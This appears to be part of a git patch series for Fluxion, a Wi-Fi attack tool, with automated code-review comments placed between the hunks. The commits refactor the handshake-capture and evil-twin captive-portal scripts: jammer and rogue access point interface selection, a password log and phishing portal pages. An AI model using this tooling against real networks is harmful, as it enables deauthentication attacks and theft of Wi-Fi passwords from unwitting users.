a3e6c83..eed0268 100755 --- a/language/en.sh +++ b/language/en.sh 
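Review bot: In the `fluxion` hunk, `return -2` for a failed undo reuses the status `fluxion_do_sequence` already returns for an empty sequence (`if [ ${#__fluxion_do_sequence__sequence[@]} -eq 0 ]; then return -2`, visible in an earlier hunk on this page). A caller therefore cannot tell the two conditions apart. Pick an unused value, e.g. `return -5`, and list the codes in the comment block above the function. Negative arguments to `return` wrap modulo 256 (254, 253, …) and, as far as I recall, are rejected by some older bash releases, so small positive codes would be the safer convention. The function starts before this hunk.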
@@ -21,6 +21,14 @@ FLUXIONPhysicalWIDeviceUnknownError="${CRed}Unable to determine interface's phys FLUXIONStartingWIMonitorNotice="Starting monitor interface..." FLUXIONInterfaceAllocatedNotice="${CGrn}Interface allocation succeeded!" FLUXIONInterfaceAllocationFailedError="${CRed}Interface reservation failed!" + + +FLUXIONIncompleteTargettingInfoNotice="Missing essid, bssid, or channel information!" + +FLUXIONTargettingAccessPointAboveNotice="Fluxion is targetting the access point above." + +FLUXIONContinueWithTargetQuery="Continue with this target?" + # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONStartingScannerNotice="Starting scanner, please wait..." FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the FLUXION Scanner." @@ -61,7 +69,7 @@ FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}recommended FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}unreliable$CClr)" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Select a wireless attack for the access point" -FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attack in progress..." +FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralBackOption="${CRed}Back" From cdbce5dbf62e51e6b67ffc5049c85be66df19213 Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 15:26:04 -0600 Subject: [PATCH 17/45] Fixed minor bugs caused by obsolecense. --- attacks/Handshake Snooper/attack.sh | 15 ++++++++++----- attacks/Handshake Snooper/language/en.sh | 2 ++ fluxion | 19 +++++++++++++------ 3 files changed, 25 insertions(+), 11 deletions(-) diff --git a/attacks/Handshake Snooper/attack.sh b/attacks/Handshake Snooper/attack.sh index 283fa15..1f6003c 100755 
--- a/attacks/Handshake Snooper/attack.sh +++ b/attacks/Handshake Snooper/attack.sh @@ -237,13 +237,14 @@ handshake_snooper_set_jammer_interface() { if [ "$HANDSHAKEDeauthenticatorIdentifier" = \ "$HandshakeSnooperMonitorMethodOption" ]; then return 0; fi - echo "Running get interface." > $FLUXIONOutputDevice - if ! fluxion_get_interface attack_targetting_interfaces; then - echo "Failed to get interface" > $FLUXIONOutputDevice + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$HandshakeSnooperJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice return 1 fi - echo "Succeeded get interface." > $FLUXIONOutputDevice + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice HandshakeSnooperJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} } @@ -345,7 +346,9 @@ if [ ! "$HandshakeSnooperCLIArguments" ]; then --longoptions="verifier:,interval:,jammer:,asynchronous" \ --name="Handshake Snooper V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then - echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 10 + echo -e "${CRed}Aborted$CClr, parameter error detected..." + sleep 5 + fluxion_handle_exit fi declare -r HandshakeSnooperCLIArguments=$HandshakeSnooperCLIArguments @@ -371,6 +374,7 @@ while [ "$1" != "" -a "$1" != "--" ]; do shift # Shift new parameters done + # ============================================================ # # ===================== < Fluxion Hooks > ==================== # # ============================================================ # @@ -388,6 +392,7 @@ unprep_attack() { handshake_snooper_unset_verifier_synchronicity handshake_snooper_unset_verifier_interval handshake_snooper_unset_verifier_identifier + handshake_snooper_unset_jammer_interface handshake_snooper_unset_deauthenticator_identifier sandbox_remove_workfile "$FLUXIONWorkspacePath/capture" 
diff --git a/attacks/Handshake Snooper/language/en.sh b/attacks/Handshake Snooper/language/en.sh index abf241a..23823e5 100755 --- a/attacks/Handshake Snooper/language/en.sh +++ b/attacks/Handshake Snooper/language/en.sh @@ -2,6 +2,8 @@ # identifier: Handshake Snopper # description: Acquires WPA/WPA2 encryption hashes. + +HandshakeSnooperJammerInterfaceQuery="Select an interface for jamming." # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> HandshakeSnooperMethodQuery="Select a method of handshake retrieval" HandshakeSnooperMonitorMethodOption="Monitor (${CYel}passive$CClr)" diff --git a/fluxion b/fluxion index f52bb1e..af2cea5 100755 --- a/fluxion +++ b/fluxion @@ -583,7 +583,7 @@ fluxion_do_sequence() { fi __fluxion_do_sequence__instruction=${__fluxion_do_sequence__sequence[$__fluxion_do_sequence__instructionIndex]} - echo "Next Instruction: $__fluxion_do_sequence__instruction" \ + echo "Running next: $__fluxion_do_sequence__instruction" \ > $FLUXIONOutputDevice done } @@ -865,6 +865,12 @@ fluxion_allocate_interface() { # Reserve interfaces fluxion_get_interface() { if ! type -t "$1" &> /dev/null; then return 1; fi + if [ "$2" ]; then + local -r interfaceQuery="$2" + else + local -r interfaceQuery=$FLUXIONInterfaceQuery + fi + while true; do local interfacesAvailable readarray -t interfacesAvailable < <($1) @@ -923,7 +929,7 @@ fluxion_get_interface() { "$CRed[$CSYel%1d$CClr$CRed]%b %-8b %3s$CClr %-*.*s\n" io_query_format_fields \ - "$FLUXIONVLine $FLUXIONInterfaceQuery" "$FormatApplyAutosize" \ + "$FLUXIONVLine $interfaceQuery" "$FormatApplyAutosize" \ interfacesAvailableColor[@] interfacesAvailable[@] \ interfacesAvailableState[@] interfacesAvailableInfo[@] 
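Review bot: The `if`/`else` added at the top of `fluxion_get_interface` declares the same read-only local in both branches; a default expansion says it in one line: `local -r interfaceQuery=${2:-$FLUXIONInterfaceQuery}`. The new optional second parameter is not documented anywhere in the hunk; a line such as `# Parameters: <interface lister function> [<query text>]` above the function would record it. The function body continues past the end of this hunk.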
@@ -1163,7 +1169,7 @@ fluxion_get_target() { # shit'll hit the fan and we'll have an extremly distressed user. # Replacing ' ', '/', '.', '~', '\' with '_' FluxionTargetSSIDClean=$( - echo "$FLUXIONGetTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' + echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' ) # We'll change a single hex digit from the target AP's MAC address. @@ -1214,7 +1220,7 @@ fluxion_hash_verify() { echo -e "$FLUXIONVLine $FLUXIONHashVerificationMethodQuery" echo - fluxion_show_ap_info + fluxion_target_show \ "$hashESSID" \ "$hashEncryption" \ "$hashChannel" \ @@ -1264,6 +1270,7 @@ fluxion_hash_verify() { } fluxion_hash_unset_path() { + if [ ! "$FluxionHashPath" ]; then return 1; fi FluxionHashPath="" } @@ -1333,12 +1340,12 @@ fluxion_hash_set_path() { } # Paramters: -fluxion_hash_get() { +fluxion_hash_get_path() { # Assure we've got the bssid and the essid passed in. if [ ${#@} -lt 2 ]; then return 1; fi while true; do - if ! fluxion_hash_set_path "$1"; then return $?; fi + if ! fluxion_hash_set_path "$@"; then return $?; fi if fluxion_hash_verify "$FluxionHashPath" "${@:1}"; then break; From 065bec6b0f09a5c62c827770cf9696c7b500d40a Mon Sep 17 00:00:00 2001 From: Matias Barcenas Date: Wed, 17 Jan 2018 15:29:05 -0600 Subject: [PATCH 18/45] Started upgrading the Captive Portal attack. Rewrote sections of the script to follow the coding style guide closer. Implemented and adapted attack requirements for Fluxion v4. Implemented the script loop using the sequencing framework. Updated usage of old services to new, including global identifiers. Implemented and added command line interface flag control. Some refactoring & removing outdated code. --- attacks/Captive Portal/attack.sh | 757 ++++++++++++++------------ attacks/Captive Portal/language/en.sh | 2 + language/en.sh | 6 +- 3 files changed, 425 insertions(+), 340 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 1f31b2f..c792ec9 100755 
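Review bot: The clean-up in `fluxion_get_target` (hunk `-1163/+1169`) is still a deny-list: the `sed` expression rewrites only space, `/`, `.`, `~` and `\`, so quotes, `$`, backquotes, `*` and control characters in the SSID pass through into `FluxionTargetSSIDClean`. The SSID is data received from nearby devices, and later hunks in this series use the cleaned value in file paths and inside generated shell text, so an allow-list is the safer form: `printf '%s' "$FluxionTargetSSID" | LC_ALL=C sed -r 's/[^A-Za-z0-9_-]+/_/g'`. `printf` also avoids `echo` treating an SSID such as `-n` as an option. The function starts and ends outside this hunk.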
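Review bot: In `fluxion_hash_get_path` (hunk `-1333/+1340`), `if ! fluxion_hash_set_path "$@"; then return $?; fi` returns 0 when the call fails, because inside the `then` branch `$?` holds the status of the negated test, not of `fluxion_hash_set_path`. A caller that checks the result would read a failed or cancelled path selection as success; `fluxion_hash_set_path "$@" || return $?` keeps the real status. Separately, `"${@:1}"` on the verify call is identical to `"$@"`, so the path is passed twice; if only the BSSID and ESSID were meant, that is `"${@:2}"`, to be confirmed against `fluxion_hash_verify`. The `# Paramters:` comment above the function is empty and misspelled, and the loop continues past the hunk.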
--- a/attacks/Captive Portal/attack.sh
+++ b/attacks/Captive Portal/attack.sh
@@ -1,221 +1,211 @@ #!/bin/bash -############################# < Captive Portal Parameters > ############################ +# ============================================================ # +# =============== < Captive Portal Parameters > ============== # +# ============================================================ # CaptivePortalState="Not Ready" CaptivePortalPassLog="$FLUXIONPath/attacks/Captive Portal/pwdlog" CaptivePortalNetLog="$FLUXIONPath/attacks/Captive Portal/netlog" -CaptivePortalJamTime="9999999999999" -CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") -CaptivePortalAuthenticationMethodsInfo=("(handshake file, ${CGrn}recommended$CClr)") # "(Target AP authentication, slow)") +CaptivePortalAuthenticationMethods=("hash") # "wpa_supplicant") +CaptivePortalAuthenticationMethodsInfo=( + "(handshake file, ${CGrn}recommended$CClr)" +) # "(Target AP authentication, slow)") -########################### < Virtual Network Configuration > ########################## -# To avoid collapsing with an already connected network, we'll use an uncommon network. -VIGWAddress="192.168.254.1" -VIGWNetwork=${VIGWAddress%.*} +# ============= < Virtual Network Configuration > ============ # +# To avoid collapsing with an already existing network, +# we'll use a somewhat uncommon network and server IP. +CaptivePortalVIGWAddress="192.168.254.1" +CaptivePortalVIGWNetwork=${CaptivePortalVIGWAddress%.*} -function captive_portal_run_interface() { - if [ ! "$1" ]; then return 1; fi - # Create an identifier for the access point, AP virtual interface. - local wiAccessPoint="FX${1:2}AP" +# ============================================================ # +# ============== < Captive Portal Subroutines > ============== # +# ============================================================ # +captive_portal_unset_jammer_interface() { + if [ ! "$CaptivePortalJammerInterface" ]; then return 1; fi + CaptivePortalJammerInterface="" - # Find interface's physical device. - if ! 
interface_physical "$1"; then - echo -e "$FLUXIONVLine $FLUXIONPhysicalWIDeviceUnknownError" - sleep 5 + # Check if we're automatically selecting the interface & skip + # this one if so to take the user back properly. + local interfacesAvailable + readarray -t interfacesAvailable < <(attack_targetting_interfaces) + + if [ ${#interfacesAvailable[@]} -le 1 ]; then return 2; fi +} + +captive_portal_set_jammer_interface() { + if [ "$CaptivePortalJammerInterface" ]; then return 0; fi + + echo "Running get jammer interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface attack_targetting_interfaces \ + "$CaptivePortalJammerInterfaceQuery"; then + echo "Failed to get jammer interface" > $FLUXIONOutputDevice return 1 fi - local wiAccessPointDevice="$InterfacePhysical" - - # Create the new virtual interface with the generated identifier. - echo -e "$FLUXIONVLine $CaptivePortalStartingInterfaceNotice" - if ! iw phy $wiAccessPointDevice interface add $wiAccessPoint type monitor 2>$FLUXIONOutputDevice; then - echo -e "$FLUXIONVLine $CaptivePortalCannotStartInterfaceError" - sleep 5 - return 3 - fi - - echo -e "$FLUXIONVLine $CaptivePortalStartedInterfaceNotice" - sleep 3 - - CaptivePortalRunInterface="$wiAccessPoint" + echo "Succeeded get jammer interface." > $FLUXIONOutputDevice + CaptivePortalJammerInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} } -function captive_portal_unset_interface() { - if [ ! "$WIAccessPoint" ]; then return 1; fi - - if interface_is_wireless "$WIAccessPoint"; then fluxion_unset_ap_service - fi - - if [ "$WIAccessPoint" = "FX${WIMonitor:2}AP" ]; then - # Remove any previously created fluxion AP interfaces. 
- iw dev "$WIAccessPoint" del &>$FLUXIONOutputDevice - fi - - WIAccessPoint="" +captive_portal_ap_interfaces() { + interface_list_all + local interface + for interface in "${InterfaceListAll[@]}"; do + if [ "$interface" = "lo" ]; then continue; fi + echo "$interface" + done } -function captive_portal_set_interface() { - if [ "$WIAccessPoint" ]; then return 0; fi +captive_portal_unset_ap_interface() { + if [ ! "$CaptivePortalAPInterface" ]; then return 1; fi + CaptivePortalAPInterface="" +} - captive_portal_unset_interface +captive_portal_set_ap_interface() { + if [ "$CaptivePortalAPInterface" ]; then return 0; fi - # Gather candidate interfaces. - echo -e "$FLUXIONVLine $FLUXIONFindingWINotice" - - # List of all valid network interfaces. - interface_list_real - - local ifAlternate=("$FLUXIONGeneralRepeatOption" "$FLUXIONGeneralBackOption") - local ifAlternateInfo=("" "") - local ifAlternateState=("" "") - local ifAlternateColor=("$CClr" "$CClr") - - interface_prompt "$FLUXIONVLine $CaptivePortalInterfaceQuery" InterfaceListReal[@] \ - ifAlternate[@] ifAlternateInfo[@] ifAlternateState[@] ifAlternateColor[@] - - case "$InterfacePromptIfSelected" in - "$FLUXIONGeneralBackOption") - captive_portal_unset_interface + echo "Running get ap interface." > $FLUXIONOutputDevice + if ! fluxion_get_interface captive_portal_ap_interfaces \ + "$CaptivePortalAPInterfaceQuery"; then + echo "Failed to get ap interface" > $FLUXIONOutputDevice return 1 - ;; - - # If the monitor interface is also the AP interface, - # there's no need to reserve it again, just add it. - "$WIMonitor") - if ! captive_portal_run_interface "$InterfacePromptIfSelected"; then return 1 - fi - - WIAccessPoint="$CaptivePortalRunInterface" - ;; - *) - # We'll only attempt to run wireless interfaces for now. - # The conditional below is a temporary fix for ethernet interfaces. - # TODO: Fix fluxion_run_interface to accept non-wireless interfaces. - if interface_is_wireless "$InterfacePromptIfSelected"; then - if ! 
fluxion_run_interface "$InterfacePromptIfSelected"; then return 2 - fi - - WIAccessPoint="$FluxionRunInterface" - else - WIAccessPoint="$InterfacePromptIfSelected" - fi - ;; - esac - - VIGW=$WIAccessPoint - VIAP=$WIAccessPoint - - # Set an AP service if the interface selected is wireless. - if interface_is_wireless "$WIAccessPoint"; then - if ! fluxion_set_ap_service; then - captive_portal_unset_interface - return 1 - fi fi + + echo "Succeeded get ap interface." > $FLUXIONOutputDevice + CaptivePortalAPInterface=${FluxionInterfaces[$FluxionInterfaceSelected]} } -function captive_portal_unset_auth() { - if [ ! "$APRogueAuthMode" ]; then return 0; fi +captive_portal_unset_authenticator() { + if [ ! "$CaptivePortalAuthenticatorMode" ]; then return 0; fi - case "$APRogueAuthMode" in - "hash") fluxion_unset_hash ;; + case "$CaptivePortalAuthenticatorMode" in + "hash") fluxion_unset_hash ;; esac - APRogueAuthMode="" + CaptivePortalAuthenticatorMode="" # If we've only got one option, then the user skipped this section # by auto-selecting that single option, so we unset the previous # phase along with this one to properly take the user back. if [ ${#CaptivePortalAuthenticationMethods[@]} -le 1 ]; then - captive_portal_unset_interface + return 1 # Trigger undo chain because it was auto-selected. fi } -function captive_portal_set_auth() { - if [ "$APRogueAuthMode" ]; then - echo "Captive Portal authentication mode is already set, skipping!" >$FLUXIONOutputDevice +captive_portal_set_authenticator() { + if [ "$CaptivePortalAuthenticatorMode" ]; then + echo "Captive Portal authentication mode is already set, skipping!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_auth + captive_portal_unset_authenticator # If we've got only one choice, auto-select it for the user. 
- if [ ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ - ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a "$FLUXIONAuto" ]; then - APRogueAuthMode="${CaptivePortalAuthenticationMethods[0]}" - echo "Auto-selected authentication method: $APRogueAuthMode" >$FLUXIONOutputDevice + if [ \ + ${#CaptivePortalAuthenticationMethods[@]} -eq 1 -o \ + ${#CaptivePortalAuthenticationMethods[@]} -ge 1 -a \ + "$FLUXIONAuto" ]; then + CaptivePortalAuthenticatorMode="${CaptivePortalAuthenticationMethods[0]}" + echo "Auto-selected auth-method: $CaptivePortalAuthenticatorMode" \ + > $FLUXIONOutputDevice else fluxion_header echo -e "$FLUXIONVLine $CaptivePortalVerificationMethodQuery" echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ + "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" - local choices=("${CaptivePortalAuthenticationMethods[@]}" "$FLUXIONGeneralBackOption") - io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" choices[@] \ - CaptivePortalAuthenticationMethodsInfo[@] + local choices=( + "${CaptivePortalAuthenticationMethods[@]}" + "$FLUXIONGeneralBackOption" + ) + io_query_format_fields "" "\t$CRed[$CYel%d$CRed]$CClr %b %b\n" \ + choices[@] CaptivePortalAuthenticationMethodsInfo[@] echo - APRogueAuthMode="${IOQueryFormatFields[0]}" + CaptivePortalAuthenticatorMode="${IOQueryFormatFields[0]}" # If we're going back, reset everything and abort. - if [[ "$APRogueAuthMode" == "$FLUXIONGeneralBackOption" ]]; then - captive_portal_unset_auth - return 1 + if [[ \ + "$CaptivePortalAuthenticatorMode" == \ + "$FLUXIONGeneralBackOption" ]]; then + captive_portal_unset_authenticator + return -1 fi fi # Process the authentication method selected. - captive_portal_set_auth_processingResult=1 # Assume failure. - case "$APRogueAuthMode" in - "hash") - fluxion_set_hash - captive_portal_set_auth_processingResult=$? 
- ;; + local result=1 # Assume failure at first. + case "$CaptivePortalAuthenticatorMode" in + "hash") + # Pass default path if no path is set yet. + if [ ! "$CaptivePortalHashPath" ]; then + CaptivePortalHashPath="$FLUXIONPath/attacks/Handshake Snooper/handshakes/$FluxionTargetSSIDClean-$FluxionTargetMAC.cap" + fi + + fluxion_hash_get_path \ + "$CaptivePortalHashPath" "$FluxionTargetMAC" "$FluxionTargetSSID" + result=$? + + if [ $result -eq 0 ]; then + CaptivePortalHashPath="$FluxionHashPath" + fi + ;; esac - # Assure authentication method processing was successful, abort otherwise. - if [[ $captive_portal_set_auth_processingResult -ne 0 ]]; then - captive_portal_unset_auth + # Assure authentication method processing succeeded, abort otherwise. + if [[ $result -ne 0 ]]; then + echo "Auth-mode error code $result!" > $FLUXIONOutputPath return 1 fi } -function captive_portal_run_certificate_generator() { - xterm -bg "#000000" -fg "#CCCCCC" -title "Generating Self-Signed SSL Certificate" -e openssl req -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' -new -newkey rsa:2048 -days 365 -nodes -x509 -keyout "$FLUXIONWorkspacePath/server.pem" -out "$FLUXIONWorkspacePath/server.pem" # more details there https://www.openssl.org/docs/manmaster/apps/openssl.html +captive_portal_run_certificate_generator() { + xterm -bg "#000000" -fg "#CCCCCC" \ + -title "Generating Self-Signed SSL Certificate" -e openssl req \ + -subj '/CN=captive.router.lan/O=CaptivePortal/OU=Networking/C=US' \ + -new -newkey rsa:2048 -days 365 -nodes -x509 \ + -keyout "$FLUXIONWorkspacePath/server.pem" \ + -out "$FLUXIONWorkspacePath/server.pem" + # Details -> https://www.openssl.org/docs/manmaster/apps/openssl.html chmod 400 "$FLUXIONWorkspacePath/server.pem" } -function captive_portal_unset_cert() { +captive_portal_unset_certificate() { + if [ ! 
"$CaptivePortalSSL" ]; then return 1; fi sandbox_remove_workfile "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="" } # Create Self-Signed SSL Certificate -function captive_portal_set_cert() { +captive_portal_set_certificate() { if [ "$CaptivePortalSSL" ]; then - echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" >$FLUXIONOutputDevice + echo "Captive Portal SSL mode already set to $CaptivePortalSSL!" \ + > $FLUXIONOutputDevice return 0 fi - captive_portal_unset_cert + captive_portal_unset_certificate - # Check for existance of ssl certificate within fluxion with file size > 0 - # If a certificate exists, it's user supplied (fancy), copy it to fluxspace. - if [ -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ - -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" ]; then + # Check existance of ssl certificate within fluxion with file size > 0 + # If user-supplied (fancy) certificate exists, copy it to fluxspace. + if [ \ + -f "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" -a \ + -s "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ + ]; then cp "$FLUXIONPath/attacks/Captive Portal/certificate/server.pem" \ "$FLUXIONWorkspacePath/server.pem" CaptivePortalSSL="enabled" # Must be enabled if sourcing own certificate - echo "Captive Portal certificate was user supplied, skipping query!" >$FLUXIONOutputDevice + echo "Captive Portal certificate was user supplied, skipping query!" \ + > $FLUXIONOutputDevice return 0 fi 
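Review bot: At the end of `captive_portal_set_authenticator`, the failure message is redirected to `$FLUXIONOutputPath`, a name that appears nowhere else in the visible part of this patch; every other diagnostic goes to `$FLUXIONOutputDevice`. If that variable is unset the redirection itself fails with an ambiguous-redirect error and the error code is never logged, so the line should read `echo "Auth-mode error code $result!" > "$FLUXIONOutputDevice"`. In the same function `return -1` is not a portable status (bash reports it as 255 and older versions reject it), so a documented positive code is clearer if the caller needs to tell "back" from "error".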
@@ -227,81 +217,90 @@ function captive_portal_set_cert() { fi CaptivePortalSSL="enabled" else - local choices=("$CaptivePortalCertificateSourceGenerateOption" "$CaptivePortalCertificateSourceRescanOption" "$CaptivePortalCertificateSourceDisabledOption" "$FLUXIONGeneralBackOption") + local choices=( + "$CaptivePortalCertificateSourceGenerateOption" + "$CaptivePortalCertificateSourceRescanOption" + "$CaptivePortalCertificateSourceDisabledOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$CaptivePortalCertificateSourceQuery" choices[@] echo case "$IOQueryChoice" in - "$CaptivePortalCertificateSourceGenerateOption") - # If cert generator fails, gtfo, something broke! - if ! captive_portal_run_certificate_generator; then - fluxion_conditional_bail "cert-gen failed!" + "$CaptivePortalCertificateSourceGenerateOption") + # If cert generator fails, gtfo, something broke! + if ! captive_portal_run_certificate_generator; then + fluxion_conditional_bail "cert-gen failed!" + return 2 + fi + CaptivePortalSSL="enabled" + ;; + + "$CaptivePortalCertificateSourceRescanOption") + captive_portal_set_certificate + return $? + ;; + + "$CaptivePortalCertificateSourceDisabledOption") + CaptivePortalSSL="disabled" + ;; + + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown cert-gen option!" return 2 - fi - CaptivePortalSSL="enabled" - ;; - - "$CaptivePortalCertificateSourceRescanOption") - captive_portal_set_cert - return $? - ;; - - "$CaptivePortalCertificateSourceDisabledOption") - captive_portal_unset_cert - CaptivePortalSSL="disabled" - ;; - - "$FLUXIONGeneralBackOption") - captive_portal_unset_cert - return 1 - ;; - *) - fluxion_conditional_bail "Unknown cert-gen option!" - return 2 - ;; + ;; esac fi } -function captive_portal_unset_conn() { +captive_portal_unset_connectivity() { + if [ ! 
"$CaptivePortalConnectivity" ]; then return 1; fi CaptivePortalConnectivity="" } -function captive_portal_set_conn() { +captive_portal_set_connectivity() { if [ "$CaptivePortalConnectivity" ]; then return 0; fi - captive_portal_unset_conn + captive_portal_unset_connectivity - local choices=("$CaptivePortalConnectivityDisconnectedOption" "$CaptivePortalConnectivityEmulatedOption" "$FLUXIONGeneralBackOption") + local choices=( + "$CaptivePortalConnectivityDisconnectedOption" + "$CaptivePortalConnectivityEmulatedOption" + "$FLUXIONGeneralBackOption" + ) io_query_choice "$CaptivePortalConnectivityQuery" choices[@] case "$IOQueryChoice" in - "$CaptivePortalConnectivityDisconnectedOption") CaptivePortalConnectivity="disconnected" ;; - "$CaptivePortalConnectivityEmulatedOption") CaptivePortalConnectivity="emulated" ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_conn - return 1 - ;; - *) - fluxion_conditional_bail "Unknown connectivity option!" - return 2 - ;; + "$CaptivePortalConnectivityDisconnectedOption") + CaptivePortalConnectivity="disconnected" ;; + "$CaptivePortalConnectivityEmulatedOption") + CaptivePortalConnectivity="emulated" ;; + "$FLUXIONGeneralBackOption") + return 1 + ;; + *) + fluxion_conditional_bail "Unknown connectivity option!" + return 2 + ;; esac } -function captive_portal_unset_site() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" +captive_portal_unset_user_interface() { + if [ -z "$CaptivePortalUserInterface" -o \ + ! -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 1; fi + CaptivePortalUserInterface="" } -function captive_portal_set_site() { - if [ -d "$FLUXIONWorkspacePath/captive_portal" ]; then - echo "Captive Portal site (interface) is already set, skipping!" 
>$FLUXIONOutputDevice - return 0 - fi +captive_portal_set_user_interface() { + if [ "$CaptivePortalUserInterface" != "" -a \ + -d "$FLUXIONPath/attacks/Captive Portal/sites/$CaptivePortalUserInterface.portal" ]; then return 0; fi - captive_portal_unset_site + captive_portal_unset_portal local sites=() @@ -334,7 +333,8 @@ function captive_portal_set_site() { echo - fluxion_show_ap_info "$APTargetSSID" "$APTargetEncryption" "$APTargetChannel" "$APTargetMAC" "$APTargetMaker" + fluxion_target_show "$FluxionTargetSSID" "$FluxionTargetEncryption" \ + "$FluxionTargetChannel" "$FluxionTargetMAC" "$FluxionTargetMaker" io_query_format_fields "" "$queryFieldOptionsFormat\n" \ sitesIdentifier[@] sitesLanguage[@] 
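Review bot: `captive_portal_set_user_interface` calls `captive_portal_unset_portal`, but the visible part of this patch defines only `captive_portal_unset_user_interface`; the Back branch in the following hunk (`-346/+346`) makes the same call. Unless that function exists elsewhere, both calls fail with "command not found" and the earlier selection is never cleared, so both should read `captive_portal_unset_user_interface`. The paired guards in the two functions would also be easier to read as `[ ... ] || [ ... ]` and `[ ... ] && [ ... ]` than with `-o`/`-a` inside a single `[`. The function body continues into the next hunk.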
@@ -346,39 +346,27 @@ function captive_portal_set_site() { local sitePath="${site}_${siteLanguage}" case "$site" in - "$CaptivePortalGenericInterfaceOption") - source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" - captive_portal_generic - ;; - "$FLUXIONGeneralBackOption") - captive_portal_unset_site - return 1 - ;; - *) - cp -r "$FLUXIONPath/attacks/Captive Portal/sites/$sitePath.portal" \ - "$FLUXIONWorkspacePath/captive_portal" - - find "$FLUXIONWorkspacePath/captive_portal/" -type f -exec sed -i -e 's/$APTargetSSID/'"${APTargetSSID//\//\\\/}"'/g; s/$APTargetMAC/'"${APTargetMAC//\//\\\/}"'/g; s/$APTargetChannel/'"${APTargetChannel//\//\\\/}"'/g' {} \; - ;; + "$CaptivePortalGenericInterfaceOption") + source "$FLUXIONPath/attacks/Captive Portal/generic/languages/$siteLanguage.lang" + captive_portal_generic + ;; + "$FLUXIONGeneralBackOption") + captive_portal_unset_portal + return 1 + ;; + *) + CaptivePortalUserInterface=$sitePath + ;; esac } -function captive_portal_unset_attack() { - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal_authenticator.sh" - sandbox_remove_workfile "$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" - sandbox_remove_workfile "$FLUXIONWorkspacePath/lighttpd.conf" - sandbox_remove_workfile "$FLUXIONWorkspacePath/dhcpd.leases" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal/check.php" - sandbox_remove_workfile "$FLUXIONWorkspacePath/captive_portal" - # Only reset the AP if one has been defined. 
- if [ "$APRogueService" -a "$(type -t ap_reset)" ]; then ap_reset - fi -} - -function captive_portal_get_client_IP() { - if [ -f "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" ]; then - MatchedClientIP=$(cat "$CaptivePortalPassLog/$APTargetSSIDClean-$APTargetMAC-IP.log" | sed '/^\s*$/d' | tail -n 1 | head -n 1) +captive_portal_get_client_IP() { + if [ -f "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" ]; then + MatchedClientIP=$( + cat "$CaptivePortalPassLog/$FluxionTargetSSIDClean-$FluxionTargetMAC-IP.log" | \ + sed '/^\s*$/d' | tail -n 1 | head -n 1 + ) else MatchedClientIP="unknown" fi 
